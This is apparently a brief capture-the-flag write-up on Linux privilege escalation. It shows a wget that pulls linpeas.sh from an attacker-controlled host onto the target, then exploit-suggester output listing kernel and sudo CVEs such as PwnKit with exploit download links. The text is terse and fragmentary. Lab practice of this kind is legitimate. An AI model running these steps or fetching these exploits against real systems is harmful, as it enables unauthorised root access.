PEAS automates the entire post enumeration process including some basic ones
PEAS
nibbler@nibbles:/tmp$ wget http://10.10.14.6:8000/PEASS-ng/payloads/linpeas.sh
wget http://10.10.14.6:8000/PEASS-ng/payloads/linpeas.sh
--2023-01-13 23:24:40-- http://10.10.14.6:8000/PEASS-ng/payloads/linpeas.sh
connecting to 10.10.14.6:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 827827 (808K) [text/x-sh]
saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 808.42K 2.39MB/s in 0.3s
2023-01-13 23:24:41 (2.39 MB/s) - 'linpeas.sh' saved [827827/827827]Delivery
PEAS discovered that the target system is vulnerable to CVE-2021-4034
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2017-16995] eBPF_verifier
details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
exposure: highly probable
tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
download url: https://www.exploit-db.com/download/45010
comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2016-5195] dirtycow
details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
exposure: highly probable
tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
download url: https://www.exploit-db.com/download/40611
comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
exposure: highly probable
tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
download url: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2021-4034] PwnKit
details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
exposure: probable
tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
download url: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
exposure: probable
tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
download url: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2017-7308] af_packet
details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
exposure: probable
tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
download url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
[+] [CVE-2017-6074] dccp
details: http://www.openwall.com/lists/oss-security/2017/02/22/3
exposure: probable
tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
download url: https://www.exploit-db.com/download/41458
comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000112] NETIF_F_UFO
details: http://www.openwall.com/lists/oss-security/2017/08/13/1
exposure: probable
tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
download url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
[+] [CVE-2016-8655] chocobo_root
details: http://www.openwall.com/lists/oss-security/2016/12/06/1
exposure: probable
tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
download url: https://www.exploit-db.com/download/40871
comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
[+] [CVE-2016-4557] double-fdput()
details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
exposure: probable
tags: [ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
download url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
exposure: less probable
tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
download url: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-2586] nft_object UAF
details: https://www.openwall.com/lists/oss-security/2022/08/29/5
exposure: less probable
tags: ubuntu=(20.04){kernel:5.12.13}
download url: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-3156] sudo Baron Samedit
details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
exposure: less probable
tags: mint=19,ubuntu=18|20, debian=10
download url: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
exposure: less probable
tags: ubuntu=20.04{kernel:5.8.0-*}
download url: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
exposure: less probable
tags: mint=19
download url: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2019-15666] XFRM_UAF
details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
exposure: less probable
download url:
comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
[+] [CVE-2018-1000001] RationalLove
details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
exposure: less probable
tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
download url: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
comments: kernel.unprivileged_userns_clone=1 required
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
details: https://seclists.org/oss-sec/2017/q1/184
exposure: less probable
download url: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
exposure: less probable
tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
download url: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
comments: Uses "Stack Clash" technique, works against most SUID-root binaries
[+] [CVE-2017-1000253] PIE_stack_corruption
details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
exposure: less probable
tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
download url: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c
[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE
details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
exposure: less probable
download url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only
[+] [CVE-2016-2384] usb-midi
details: https://xairy.github.io/blog/2016/cve-2016-2384
exposure: less probable
tags: ubuntu=14.04,fedora=22
download url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
[+] [CVE-2016-0728] keyring
details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
exposure: less probable
download url: https://www.exploit-db.com/download/40003
comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
PEAS also found a bunch more, but these aren’t as promising as the one earlier
Some more